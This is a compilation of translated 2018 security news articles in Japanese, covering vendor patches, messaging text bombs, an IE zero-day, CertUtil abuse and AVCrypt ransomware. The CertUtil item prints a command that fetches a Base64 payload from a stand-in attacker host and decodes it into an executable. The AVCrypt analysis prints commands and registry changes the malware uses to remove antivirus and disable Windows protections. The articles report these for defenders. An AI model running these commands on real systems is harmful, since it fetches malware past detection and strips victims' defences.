     AcrobatとReader DCのアップデートされたバージョンは、2018.011.20040である。また、Acrobat 2017とAcrobat Reader DC 2017のパッチされたバージョンは、2017.011.30080でである。Acrobat Reader DCとAcrobat DCの"Classic 2015"バージョンは、update 2015.006.30418でパッチされている。
     他方、Photoshopは、CVE-2018-4946(境界外書き込みエラーに起因するリモートコード実行のフロー)をパッチするためにアップデートされた。このフローの発見は、Trend MicroのZero Day Initiativeを介して通知した、Giwan Goの手柄である。
     Photoshop CC 2018(Windows版、Mac版共)を実行している人々は、バージョン19.1.4をインストールしなさい。Photoshop CC 2017を使用している人々は、18.1.4をダウンロードしなさい。
     この最新のAdobeアプデートは、AdobeがPatch Tuesday(パッチの火曜日)と同時にスケジュールされたFlash用の修正群をリリースした後、一週間以内に出現している。このアップデートはまた、Mac、Windows両方のCreative Cloud用アップデートを含んでいる。


    テキスト爆弾と"black dot of death"(「死の黒丸」)がWhatsAppとiMessageユーザを悩ませている
    Bitdefender : Hot for Security (2018/05/12)
     あなたが、大きく報道されていることを信じるのであれば、この問題が実際よりもっと重大なものだと、あなたは考えるだろう。
     「あなたのiPhoneを一つのテキストメッセージで消し去ってしまう"black dot of death"(『死の黒丸』)に気をつけなさい」と題された、Metro紙の記事を読みなさい。Liverpool Echoは、「あなたのスマホを破壊するかもしれないWhatsApp『テキスト爆弾』に関する警告」と述べている。そして、Birmingham Mailは、「このWhatsApp『テキスト爆弾』は、受信者のスマホを破壊する」と、主張している。
     「テキスト爆弾」とも呼ばれる脆弱性が、あなたのAndroidやiPhoneの通常操作をクラッシュさせる能力があることは真実であるが、あなたのスマホを「破壊する」と主張するのは、行き過ぎである。
     この問題の発端は、Redditユーザが、特別に細工されたテキストメッセージがWhatsAppを含む幾つかのメッセージングアプリケーションをクラッシュさせたと主張した6日前のことである。

     このメッセージ(引用符で囲まれ、laugh-until-you-cry(泣くまで笑う)絵文字が続いている文章)は、一見して無害なように見える。しかし、この絵文字と後ろの引用符との間には、表示されないように隠された数千の文字が、コッソリと隠されている。
     残念ながら、WhatsAppのようなアプリケーションは、非表示の文字列のイタズラを優雅に取り扱うことに失敗し、イライラし、ひっくり返る(アプリケーション・クラッシュを発生する)。そして、ある場合には、そのデバイス上に別の不安定さを発生させる。
     このペイロードは、iOSよりAndroidデバイスのほうが、そのインパクトにおいてより目覚ましいものがあったと、このテキスト爆弾の作者は発言している。
     今、これは、Appleの支持者達が甘んじて受ければいいという種類のニュースではない。類似の「テキスト爆弾」がAppleのデバイスをクラッシュさせるという報告がなされたのは、この一両日後のことである。
     "black dot of death"(「死の黒丸」)とも呼ばれるものは、あなたが受け取っているかもしれないメッセージである。このメッセージは、中くらいの大きさの黒丸の絵文字を含み、多分、不吉なブラックホールをクリックするように勧めるPointed Finger(指差し)絵文字を同伴しているだろう。
     「黒丸」自体は無害なように思われるが、今一度隠されているメッセージの内部を見ると、簡単に、そのスマホに過剰な負荷をかける多くの不可視のUnicode文字列が存在しており、最終的に、あなたのiMessageアプリケーションは予測不能な方法でクラッシュを発生する。
     伝えられるところによると、このバグは、iOSの現在のバージョン(11.3)、並びに、iOS 11.4 betaに影響を与える。
     影響を受けたiOSユーザは、Appleからの適切なパッチを待っているが、CNETは、システムを復元できる方法に関してアドバイスしている。簡単に、あなたのスマホは破壊されてはいない。
     2月、Appleは、インド南部テルグ語で書かれた手紙を表すUnicodeシンボルを含むブービートラップされたメッセージがイタズラ者によって送信され始めた後、この類似の"killer text bomb"脆弱性を修正した。
     "chaiOS bug"として知られる類似の「テキスト爆弾」が、1月にユーザのMac、iPhone、iPadを汚損したという事実は、Appleにとって、この問題が現在進行形の問題であることを示している。
     私は速やかにAppleが"black dot of death"(「死の黒丸」)のパッチを発表するだろうと確信しているが、私はAppleが彼らのデバイスに、この種のDoS攻撃への脆弱性を発見するのは、これが最後だろうという如何なる確信も持てないことも分かっている。
     私は、これは言うまでもないと考えたいが、念の為。他の誰かに、これらテキスト爆弾攻撃を試してみようと思うな、例え冗談でさえ。全く面白くないのだから。


    伝えられるところによるとオンライン上に不可思議なIEの0-Day、"Double Kill"
    Sophos : NakedSecurity (2018/04/25)
     "Double Kill"は、暴力的ビデオゲームの世界が誇りにしている用語である。この言葉は、あなたが一撃で二人の襲撃者を倒すことを意味している。
     サイバー犯罪の世界では、中国のコンピュータ・セキュリティ企業Qihoo(奇虎360)によって与えられた名前である。この企業が主張していることは、オンラインで積極的に悪用されているInternet Explorerの0-Dayの脆弱性である。
     知っていると思うが、0-Dayの脆弱性は、公式の修正が出る前に攻撃者の手で暴かれることから、このように名付けられている。従って、鋭敏で情報通のシステム管理者でさえ、パッチを適用する時間がないことから0-Dayの名が与えられている。
     あなたが使用できるパッチが存在していない場合、次善の策は、あなたの環境でこのバグの副作用を最小化する、もしくは除外するある種の解決策である。
    残念ながら今回の場合、Qihooは、多くを提供していない。我々は、"Double Kill"脆弱性攻撃の動作方法のたいへん大雑把な詳細しか見ることができないし、攻撃者があなたに対してこの脆弱性を悪用しようとした場合に、どのように気をつけることができるのかを見ることができるだけである。
     今までに我々が知っている全てのことは、"Double Kill"攻撃が、おそらくはeMail添付ファイルとして送られてくるWordドキュメントで開始されるということである。
     あなたが、このブービートラップされたドキュメント(これは、ある種の未特定のシェルコードを含んでいるとしてQihooによって示されている)を開くと、どうやら、Internet Explorerがバックグラウンドでアクティベートされ、最終的に、視認できる如何なる警告もなしに、実行プログラムのダウンロードと実行に導かれるようである。
     Qihooによると、これは、

     攻撃を実行するためにブラウザの0-Day脆弱性を使用した最初のOffice Documentベースの脆弱性攻撃である。悪意あるOfficeドキュメントを開くと、犠牲者のコンピュータの制御を完全に奪うことのできるトロイの木馬の感染を引き起こすだろう。(中略)。ハッカーは、悪意あるWebページを含むOfficeドキュメントを配布することによって、APT攻撃(【訳註】 Advanced Persistent Threat、特定のターゲットに対して持続的に攻撃・潜伏を行い、様々な手法を駆使して執拗なスパイ行為や妨害行為などを行うタイプの攻撃の総称(IT用語辞典より))を実行する。影響を受けたユーザが、このドキュメントを開くと、この脆弱性を使用して悪意あるスクリプトとペイロードが、リモートホストからダウンロードされ実行される。

     我々が未だ知らないことが以下である。
      ・ ドキュメントのどのファイルフォーマット(例、RTF, DOC, DOCX, XLS, XLSX, PPT, PPTX)が、この脆弱性の引き金として使用されるのか。
      ・ 少なくとも具体的な詳細が明らかにされていないので、ブービートラップされたファイルがマクロを含んでいるのか、一般的に攻撃のリスクを減少するために検出されブロックされる他のアクティブスクリプトを含んでいるのかどうか?
      ・ Officeが、この悪用を動作させることを要求されるのかどうか、あるいは、他のアプリケーション(PDF Reader やビデオプレーヤのような)がトリガーになる可能性があるのかどうか?
      ・ Internet Explorerがどのようにこの攻撃に加わっているのか?
     Qihooのダイアグラムは、ドキュメントがシェルコードを含んでいることを示しているが、Internet Explorerは、このダイアグラム中に全く描かれていない。
     しかしながら、これは、0-Dayの部分それ自体ではなく、"Double Kill"脆弱性によって爆発した一つの特定のマルウェアのペイロードの詳細のようである。

     攻撃の後段で、この脆弱性攻撃は、ファイルが検出されることを回避するために、公になっているUACバイパステクニック、ファイルステガノグラフィ(実行可能コンテンツを画像ファイルの内部に隠す)、Reflective DLL Injection(メモリ中に直接プログラムをポーキングする)を使用している

    何をすべきか?

     現時点で、我々は実際の攻撃に使用された如何なるサンプルファイルも持っていない。我々は、ブービートラップされたドキュメントが、警戒することのできる何らかの兆候を持っているのか否か分かっていない。我々は、Internet Explorerが攻撃にどのように参加するのか分かっていない。そして、我々は、Officeが、"Double Kill"の引き金に使用される唯一のアプリケーションであるか否か分かっていない。
     我々が実行できることは、今まで毎回話してきた一般的なセキュリティアドバイスを繰り返すことである。「予期していないドキュメントを開くな、たとえそれが、緊急であったり、興味あったりするものであろうとも。」
     Qihooは、どうも、Microsoftにはこの攻撃の詳細を明らかにしているようである。


    WebEXに緊急の脆弱性
    The Register : Security (2018/04/19)
     Ciscoは、攻撃者に毒性化されたFlashファイルを介してターゲットマシン上で遠隔からのコード実行を可能にしていたWebEX(【訳註】 インターネットを通じて、リアルタイムなコラボレーションを実現するWeb会議クラウド サービス(Ciscoホームページより))中の緊急の脆弱性をパッチした。
     Switchzillaは本日、WebEx Business SuiteもしくはWebEx Meetings(クライアント、サーバ共)を稼働している全てのユーザに、CVE-2018-0112をパッチするために、上記ソフトウェアをアップデートするようアドバイスしている。
     ENISA(欧州ネットワーク・情報セキュリティ機関)の研究者Alexandros Zacharisによって発見され、Ciscoに通知されたこの脆弱性は、利用者がミーティングルームにアップロードしたFlashファイル(.swf)の厳密なチェックをWebExが失敗していたことから生じている。
     Zacharisは、ファイル共有ツールを介して参加者で溢れかえっている部屋に悪意ある.swfを提出することが可能なことを発見した。
     Ciscoは、Zacharisが、このバグを通知するために直接彼らにコンタクトしてきたと、Ciscoはオンライン上でこの脆弱性をターゲットにした如何なる攻撃も認識していないと発言している。このフローのCVSSスコアは9.0であり、Ciscoによって、'Critical'(緊急)の重大度指定が与えられていた。
    WebExをアップデートする(もしくは、削除する)以外、この脆弱性に対する緩和策はないとCiscoは発言している。そこで、あなた方は、間違いなくパッチが適用されているこのソフトウェアの最新版を入手することになる。
     WebEx Business Suiteを稼働している人々に関しては、このアップデートバージョンは、それぞれT32.10 と T31.23.2 である。WebEx Meetingsユーザは、クライアントソフトウェアをT32.10にアップデートし、Meetings Serverは、2.8 MR2にアップデートしなさい。
     また、パッチを取得するのは、Unified Computing System (UCS) Directorである。この場所は、Cisco技術サポートが、エンドユーザに閲覧を可能にし、データセンター管理プラットフォームによって現在ホストされているあらゆるVM上で(ターゲットの現在のパーミッションシステムに同調して)コマンドを実行することを可能にしていたバグ(CVE-2018-0238)を発見した場所である。
     この情報公開されたバグは、UCS Director Webインターフェースを介して悪用することができる。これは、攻撃者が、正当なユーザ名とパスワードを必要とすることを意味している。このバグを悪用する(VM Management Actionsパーミッション)ために必要とされるアクセスレベルは、Defaultでエンドユーザに有効になっている。  言うまでもなく、管理者は、このフローを修正するために、UCS Directorのバージョンを6.0と6.5を"Patch 3"アップデートにアップデートしなさい。DirectorやDirector Express for Big Dataの以前のバージョンを稼働している人々は、それらのビルドが脆弱性のあるバージョンと判断されていないので運が良い。


    CertUtil.exeは、アンチウィルスをバイパスしながらマルウェアをダウンロードすることを攻撃者に可能にしていた
    BleepingComputer : News>Security (2018/04/04)
     Windowsは、CertUtilと呼ばれる組み込みプログラムを持っている。このプログラムは、Windowsで認証を管理するために使用されている。このプログラムを使用することで、あなたは、証明書やWindows証明書ストアに関連する様々な機能をインストール、バックアップ、削除、管理、実行することができる。
     CertUtilの機能の一つは、証明書、あるいは、それに関連する他のファイルをリモートURLからダウンロードし、"certutil.exe -urlcache -split -f [URL] output.file"の構文を使用して、ローカルファイルとしてそれを保存する能力である。
     セキュリティ研究者Casey Smithは、2017年に、この方法はマルウェアをダウンロードするために使用することができるだろうとする彼の懸念をツイートしている。
    Smithの懸念は、攻撃者がCertUtilを悪用し、かなり長い間マルウェアをダウンロードしていたという事実で現実のものとなった。このサンプルは、2016年にCertUtilを悪用した、そして、2018年3月の最近のトロイもまた、感染させたコンピュータに様々なバッチファイルやスクリプトをダウンロードするためにCertUtilを悪用している。


    最近のトロイで使用されているCertUtil(画像をクリックすると拡大します)

     攻撃者が既にコンピュータに足がかりを持っているにも拘わらず、CertUtilを使用することを、あなたは不思議に思うだろうか? これは、一部のコンピュータがLockdown(【訳註】 セキュリティ強化のために、OSやアプリケーションなどの機能やリソースを制限すること)されている可能性があり、そのため未知のアプリケーションがプログラムをダウンロードすることができないためである。組み込みのWindowsプログラムを使用することにより、CertUtilは、インストールされているセキュリティプログラムによってホワイトリストに登録されるので、ファイルをダウンロードすることが可能になる。
     マルウェアをダウンロードし実行するために正当なWindowsプログラムを悪用することは、Windows regsvr32.exeが類似の方法で使用されている程ではない。

    セキュリティソフトをバイパスするためにCertUtil+Base64を使用する

     本日、セキュリティコンサルタントでありISCハンドラーでもあるXavier Mertensは、ハンドラダイアリを公開した。これには、CertUtilの使用に新機軸を追加している。この新機軸は、攻撃者のダウンロードが、エッジ・セキュリティ・デバイスによって未検出のままにすることをより簡単にする可能性のあるものである。この新機軸は、最初に悪意あるファイルをBase64エンコードすることで、この悪意あるファイルを無害なテキストのように見せかけ、次に、CertUtil.exeを使用して、このファイルをダウンロードさせた後、それをデコードするものである。
     既に論議したように、あなたは以下のコマンドを使用することによってCertUtil.exeを使用してファイルをダウンロードすることができる。

    certutil.exe -urlcache -split -f [URL] output.file

     このコマンドは、ファイルをそのオリジナルの形式でダウンロードし、それをそのコンピュータに保存する。この方法の問題は、ネットワーク・セキュリティ・デバイスが、そのファイルを悪意あるものとして検出し、ブロックすることにある。
     これをかい潜るために、Martensは、エッジ・デバイス(【訳註】 LANとWANもしくはインターネットを接続するネットワークデバイスの一種(Technopediaより))に無害なテキストと思わせるために、最初に悪意あるファイルをBase64エンコードするアイデアを考案している。次に、このテキストファイルをダウンロードし、"certutil.exe -decode"コマンドを使用して、Base64でエンコードされたファイルを実行ファイルにデコードしている。
     以下が、Mertensのハンドラダイアリで説明されているものである。

    C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
    C:\Temp>certutil.exe -decode bad.txt bad.exe

     この方法は、エッジ・デバイスの検出をかい潜る可能性がある。そして、安全ではないかもしれないローカルマシン上で実行ファイルに変換される。
     私は、これが実際にオンラインで使用されていることを認識していないが、MalwareHunterTeamは、certutil.exe -decode の使用は、既に使用されていると、私に告げている。その例は、これらのサンプル中で確認できる。更に、公開後、我々はまたF5 Labのこの記事を発見した。そこでは、WindowsにコインマイナーをインストールするためにCertUtil.exeを使用するキャンペーンを詳細に説明している
     更に、Kasperskyのセキュリティ研究者Fabio Assoliniは、この方法は、暫くの間ブラジル人のプログラマによって使用されてきたものであると、我々に警告した。
     お分かりのように、新しいトリックは、毎日、通常安全で正当であるとされるWindowsプログラムを活用して考えだされている。リモート認証やサーバーにアクセスするためにCertUtilを使用していない人々にとっては、インターネットに接続する能力をロックダウンしたほうがいいかもしれない。


    IntelのMeltdown脆弱性に関するMicrosoftの三回目のパッチもまた、パッチが必要かもしれない
    The Register : Security (2018/04/03)
    Microsoftが、Intelの最先端のプロセッサ中のMeltdownセキュリティ脆弱性を修正する三回目のリリースをした数日後、システム管理者達は、彼らの多くの64-bit Windows 7とServer 2008 R2が依然として適切にパッチすることが不可能であると発言している。
     120台のWindows 7 x64 PCのアドミニストレータであるPseudo(The Registerの読者Lawrence Birdmanの匿名)は、彼のマシンの4台を除く全てが最新のアップデートを取得することができなかった(このソフトウェアの調整は、WSUS(Windows Server Update Services)では、このコンピュータ用には”Not Applicable”と表示される)と発言している。
     緊急のアップデートKB4100480は、Windows 7とWindows Server 2008 R2のMeltdown用の1月と2月のセキュリティ・アップデートでMicrosoftの技術者によって偶然導入された緊急の脆弱性を解決するためのパッチ(3月初めにリリースされた)を補完するために、先週Microsoftによってリリースされた。
     3月初めのアップデートは、1月のMeitdownパッチで導入されたセキュリティ・バグCVE-2018-1038を全滅させることを企てたが、完全に効果があったというわけではなかったので、KB4100480を入手しインストールすることが必要になった。
     残念なことに、Pseudoは、WSUSは、どこかおかしいと、彼が世話をしている116台のマシン(このシステムは、この脆弱性を含む1月と2月のセキュリティアップデートの両方を適用されている)は、この最新の修正を取得できないと発言している。
     「問題は、それらがWindows 7 x64 の120台の内の4台を除く全てが'Not Applicable'として表示されることにある」と、Birdmanは、我々に告げた。
     「私が、このアップデートに同意した場合でさえ、このアップデートを必要とするマシンには適用されなかった。これは、『必要なアップデート』の検出がバグっているかのように思われる」と続けている。

    役に立たない

     我々は、この問題に関してMicrosoftに尋ねた。その応答として、偽りなくMicrosoftの形式で、役に立たない以下の声明を受け取った。「このアップデートは、WSUSの顧客に利用可能なものである。その顧客は、そのカタログからWSUSに、それをダウンロードしインポートすることができる。」
     多分、このパッチは徐々に広がっているので、一部の人々は、それを取得していないが、いつもながら、Microsoftは、混乱した顧客を暗闇の中に残したまま、説明しようともしない。
     他のアドミニストレータもまた、似たような問題に遭遇している。Woody LeonhardのWindows-watching Webサイトでのスレッドは、この件に関することが突然発生している。彼らは、本当に彼らのマシンがパッチのパッチのパッチを必要としているが、WSUSにそれを適用させることができないと、多くの人が発言している。
     「1月から3月の適格なアップデートの複数をインストールした凡そ200のWindows Server 2008 R2システムの全てのうち、KB4100480を適用できると表示したものは僅か18台でしかなかった」と、一人の専門技術者は記述している。
     「その上、我々は、WSUSを利用するので、これら200のシステムの殆ど全てが同じパッチを当てられる。」
     Microsoftの次の定例セキュリティ・リリースは、4月10日の月例アップデートである。」


    Microsoft: Windows 7とServer 2008に対するMeltdownパッチの修正パッチを公開
    The Register : Security (2018/03/29)
    Microsoftが本日、1月と2月にリリースしたセキュリティアップデートを修正するために今月初めにリリースしたセキュリティアップデートを更に修正する緊急のセキュリティアップデートをリリースした。
     1月と2月に、Microsoftは、最先端のIntel x64プロセッサ中のMeltdownチップレベル脆弱性を解消するためにWindows 7とServer 2008 R2用のパッチを発行した。残念なことに、これらのパッチは、これらのオペレーティングシステムにセキュリティ上の重大な欠陥を開けた。通常のアプリケーションとログイン・ユーザは、このアップデートをインストールすることで、現在、物理RAMの一部にアクセスし改竄することができ、それらOSの完全な制御を取得できる。
     保護されたカーネル・メモリパスワードや他の秘密を抽出するためにMeltdownを悪用しようとするプログラムや非アドミニストレータを止める代わりに、Windows 7とServer 2008 R2用のパッチは、システムRAMに対する完全な読み込みと書き込みの特権を供与した。
     3月になり、Microsoftは、誤って開けてしまったこのセキュリティ上の脆弱性を閉じるために、1月と2月のアップデートの修正を3月の月例アップデートでリリースした。
     3月のアップデートは、この脆弱性を完全に封印するものではなかった。このバグはカーネル中に残り、悪意あるソフトウェアとユーザによって悪用可能だった。

    Total Meltdown

     現在、あなたがWindows 7もしくはServer 2008 R2を使用し、MicrosoftのMeltdownパッチを適用しているのであれば、本日のCVE-2018-1038用の緊急のアップデートを入手しインストールしたほうがいい。
     スウェーデンの研究者Ulf Friskは、Windows 7やServer 2008 R2用の1月と2月のMeltdown緩和策が、それらOSを損壊することを発見した。そして、3月の月例アップデートが開始されると直ちに彼の発見を公開した。結局の所、今月のアップデートは、この脆弱性を完全に修正しなかった。そして、Microsoftは、Windows 7やServer 2008中の0-Dayの脆弱性を改善するために緊急発進しなければならなかった。
     言い換えると、Microsoftはパッチのパッチのパッチをリリースしなければならなかった。感動するほどのことでもないが、我々は、以前のMicrosoftへの格言が真実のように思われる。「どんなに早くても、バージョン 3 まではMicrosoftの製品を信頼するな。」 他方、カーネルレベル・メモリマネージメント・コードを書くことは、その時々において、絶対に本物ではないので、開発者に幾許かの同情を与えなければならない。

    The RegisterのTwitter

     追伸、我々の中にはメモリ管理ユニットのページテーブルを操作するカーネルモードのコードを書いた者もいる。それは大変厄介で苛つくものである。Microsoftよくやった。最後に上手くいったね。
    2018年3月30日、午前6時56分

     Friskは、彼が昨日まで、依然としてOSレベルのバグがあることを知っていただけだと、The Registerに告げた。彼が、今週初め、彼がこのフローは生きていたとブログしたのは、3月のアップデートが全てを解決したという確信に基づき、Microsoftセキュリティグループを祝福したものである。
     言うまでもなく、あなたがWindows 7やServer 2008 R2の何方かを所有もしくは管理しているのであれば、可能な限り早急にこの修正をテストし配備したほうがいい。


    MeltdownとSpectreの後、Intel CPUは今、BranchScope攻撃に対する脆弱性がある
    Softpedia : News > Security (2018/03/28)
     我々は未だ、数十億のデバイスに攻撃の危険を与えたMeltdownとSpectreフローを終えていないが、セキュリティ研究者達は、BranchScopeと呼ばれる新しい波状攻撃を発見した。
     BranchScopeとは何か? これは、ウィリアム・アンド・メアリー大学、カーネギーメロン大学カタール校、カリフォルニア大学リバーサイド校、ニューヨーク州立大学ビンガムトン校の四人のセキュリティ研究者によって発見された新しいサイドチャンネル攻撃(【訳註】 暗号装置の動作状況を様々な物理的手段で観察することにより、装置内部のセンシティブな情報を取得しようとする攻撃(暗号解読)方法の総称(Wikipediaより))である。この攻撃は、Intelプロセッサで稼働しているデバイスに影響を与え、MeltdownとSpectre緩和策に対して免疫があるかもしれない。
     彼らの論文によると、それらがもう少し精緻であったとしても、このBranchScope攻撃は、攻撃者が、セキュリティ脆弱性を悪用し、共有されている方向性分岐予測(【訳註】 プログラム実行の流れの中で条件分岐命令が分岐するかしないかを予測することにより、命令パイプラインの効果を可能な限り維持し、性能を高めるためのCPU内の機能(Wikipediaより))を巧みに操ることによって重要なデータ(パスワードと暗号化キーを含む)を未パッチのシステムから取得できるという点で、MeltdownやSpectreフローと同じダメージを実行することができる。
     「攻撃の成功は、主に正確なタイミングによって巧みに分岐操作を実行する能力に依存する」と、この論文は記述しており、更に、「OSをコントロールした攻撃者は、犠牲者実行タイミングを簡単に操作できる。例えば、攻撃者は、幾つかの指示を実行させた後、Enclaveコードを中断させるようにAdvanced Programmable Interrupt Controller(APIC、【訳註】 インテルにより開発された、x86アーキテクチャにおける割り込みコントローラのこと(Wikipediaより))を設定することができる。」

    Sandy Bridge, Haswell, Skylakeも影響を受ける

     この研究者達は、最近の3つのIntel Core i5、Core i7、x86_64(64-bit)プロセッサ・ファミリー(Sandy Bridge, Haswell, Skylakeを含む)で、BranchScope攻撃をデモしている。これらの攻撃の最悪の部分は、BranchScopeが拡張され、攻撃者がIntel SGX(Software Guard Extensions)エンクロージャ内で実行されているアプリケーションを対象とする、より高度で柔軟な攻撃を実行するための追加ツールを提供できることにある。
     彼らの論文(あなたがBranchScope脆弱性について知られていることの全てを学習したいのであれば、必読である)で、セキュリティ研究者達は、BranchScope攻撃のためにソフトウェアとハードウェア ベースの緩和策を提案している。それ故、我々は、インテルが、彼らのプロセッサ用に、BranchScope脆弱性を完全にパッチする新しいマイクロコード・アップデートをリリースすることを期待する。従って、あなたは常にシステムを最新にするようにしなさい。

    アップデート: Intelのスポークスマンは、以下の声明を我々に提供した。

     「我々は、これらの研究者と共に作業中である。そして、彼らが説明している方法は、既知のサイドチャンネル悪用に類似している。我々は、既知のサイドチャンネル悪用のための既存のソフトウェア緩和策(サイドチャンネル耐性暗号の使用のような)が、この論文で説明されている方法に対して効果的であると予測している。我々は、研究コミュニティとの緊密なパートナーシップが、顧客とそのデータを保護する最良の方法の一つであると確信しており、これらの研究者の協力に感謝している。」


    AVCrypt身代金要求型マルウェアはアンチウィルスソフトをアンインストールしようとする
    BleepingComputer : News>Security (2018/03/23)
     AVCryptと名付けられた新しい身代金要求型マルウェアは、コンピュータを暗号化する前に存在しているセキュリティソフトをアンインストールしようとしていることが発見された。更に、この身代金要求型マルウェアはWindows Updateを含む多くのサービスを削除し、接触情報を提供しない。この身代金要求型マルウェアはワイパー(【訳註】 すべてのデータを消し去ってしまうマルウェア。PCの持ち主に残されるのは、完全にクリーンアップされた、ほとんど動作しないハードウェアの残骸。一番有名なワイパーはShamoon(Kasperskyブログより))の可能性がある。
     この身代金要求型マルウェアを発見したMalwareHunterTeam(筆者Lawrence AbramsとMichael Gillespie)の解析で、ファイル名が単純なav2018.exeであったので、この身代金要求型マルウェアはAVCryptと名付けられた。だが、このマルウェアの開発者は、この身代金要求型マルウェアのサンプル中に発見された幾つかのデバッグメッセージに基づきLOLと名付けている可能性がある。

    デバッグメッセージ

     名前が何であれ、この感染は、我々が今まで確認していない方法でソフトウェアをアンインストールすることを企てる。これらの機能は、以下のセクションで概説する。

    AVCcryptはセキュリティソフトをアンインストールしようとする。

     既に述べたように、AvCryptが起動すると、インストールされているセキュリティソフトを犠牲者のコンピュータから削除しようとする。このマルウェアは、これを二つの方法で実行する。(1)特にWindows DefenderとMalwarebytesをターゲットにすることによって、(2)インストールされているアンチウィルスソフトを検索することによって、次に、それらを削除しようとする。
     AVCryptは最初に、MalwarebytesとWindows Defenderの適切なオペレーションに関して要求されるWindowsサービスを削除する。これは、以下のフォーマットのようなコマンドを使用して実行される。

    cmd.exe /C sc config "MBAMService" start= disabled & sc stop "MBAMService" & sc delete "MBAMService";

     次に、どのアンチウィルスソフトがWindows Security Centerに登録されているかを調べ、WMICを介して、そのアンチウィルスを削除しようとする。

    cmd.exe /C wmic product where ( Vendor like "%Emsisoft%" ) call uninstall /nointeractive & shutdown /a & shutdown /a & shutdown /a;

     だが、上述のコマンドでは、Emsisoftをアンインストールすることはできない。このコマンドが、他のアンチウィルスソフトで動作するか否かは分かっていない。

    ワイパーか、開発中に身代金要求型マルウェアなのか?

     この時点で、AVCryptは、何方の分類にも結びつく特徴があることから、開発段階の身代金要求型マルウェアなのか、ワイパーなのか明らかではない。
     ワイパーの側面として、この身代金要求型マルウェアは、起動すると様々なWindowsサービスを削除しようとする。削除されるWindowsのサービスは以下である。

    MBAMService
    MBAMSwissArmy
    MBAMChameleon
    MBAMWebProtection
    MBAMFarflt
    ESProtectionDriver
    MBAMProtection
    Schedule
    WPDBusEnum
    TermService
    SDRSVC
    RasMan
    PcaSvc
    MsMpSvc
    SharedAccess
    wscsvc
    srservice
    VSS
    swprv
    WerSvc
    MpsSvc
    WinDefend
    wuauserv

    これらのサービスが削除された後も、Windowsは機能を継続するが、おそらく、Windowsの適切なオペレーションに問題が発生するだろう。
     更に、この身代金要求型マルウェアによって作成された脅迫文は、接触情報を何も提供していない。この身代金要求型マルウェアの脅迫文は、単純に"lol n"となっているだけである。

     同時に、この感染は、リモートのTORサイトに暗号化キーをアップロードする、そして、この脅迫文の内容は単なるプレースホルダであるかもしれない。更に、この身代金要求型マルウェアが実行されると、それが起動する前に警告を表示する。そこには多くのデバッグメッセージがあるので、開発段階の身代金要求型マルウェアである可能性が十分ある。
     Microsoftは、この身代金要求型マルウェアの二つのサンプル(その何方も、私のコンピュータ中に存在している可能性がある)を検出しただけなので、この感染は現在開発中のものだと思うとBleepinComputerに伝えてきている。Microsoftは、この身代金要求型マルウェアをRansom:Win32/Pactelung.Aとして検出している。

    既に攻撃が始まっているのか、それとも単なる偶然なのか?

     私はこの身代金要求型マルウェアが開発段階のものとする見解に傾いているが、セキュリティ研究者がTwitterに投稿したところによると、日本の大学(【訳註】 中部大学)のコンピュータが、アンチウィルスソフトをアンインストールする身代金要求型マルウェアに最近感染している。
     BleepingComputerは、このメールにリストされているeMailアドレスに連絡したが、この記事を公開した時点で返信をもらっていない。

    AVCrypt暗号化プロセス

     AVCryptが実行されると、短い間アイドリング状態になり、埋め込まれているTORクライアントを抽出し、暗号化キー、タイムゾーン、犠牲者のWindowsバージョンを送信するbxp44w3qwwrmuupc.onionコマンド&コントロール サーバーに接続する。そのキーの一部としてメモリーから他のコンテンツを追加しているので、この送信中にはエラーが存在しているようである。
     そこで、これは、今までのセクションで説明したように、様々なセキュリティプログラムを削除しようとする。次に、暗号化するためのファイルをスキャンする。ファイルを暗号化すると、そのファイルは、+[original_name]にリネームされる。例えば、test.jpgと名付けられていたファイルが暗号化されると、+test.jpgにリネームされる。

    暗号化されたファイル

     ファイルが暗号化された各フォルダには、+HOW_TO_UNLOCK.txtと名付けられた脅迫文が作成される。この脅迫文には、以下に示すように、如何なる接触情報も指示も含まれていない。

    AVCryptの脅迫文

     このマルウェアが実行されている間、そのコンピュータのセキュリティを減少させるために様々なレジストリ値を追加したり削除したりもする。
     追加されるレジストリ値は以下を含む。

    HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations\LowRiskFileTypes     .cmd;.exe;.bat;
    HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows     %AppData%\[username].exe
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\HideSCAHealth     1
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Windows     C:\Users\User\AppData\Roaming\User.exe
    HKLM\SOFTWARE\Policies\Microsoft\Windows\System\EnableSmartScreen     0
    HKLM\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard
    HKLM\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard\RequirePlatformSecurityFeatures     0
    HKLM\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard\LsaCfgFlags     0
    HKLM\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard\HVCIMATRequired     0
    HKLM\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard\HypervisorEnforcedCodeIntegrity     0
    HKLM\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard\EnableVirtualizationBasedSecurity     0
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware     1
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring     1

     値が変更されるものの一部には、以下が含まれる。

    HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden     "0"     (old value="1")
    HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip     "0"     (old value="1")
    HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden     "0"     (old value="1")
    HKLM\SOFTWARE\Microsoft\Security Center\cval     "0"     (old value="1")
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA     "0"     (old value="1")
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization     "0"     (old value="1")

     実行されると、このマルウェアは、+.batと名付けられたバッチファイルを実行する。これはドロップされたあらゆるファイルをクリーンアップし、イベントログをクリアし、この身代金要求型マルウェアのプロセスを終了し、そして、このオートランエントリを削除する。

    バッチファイルの内容

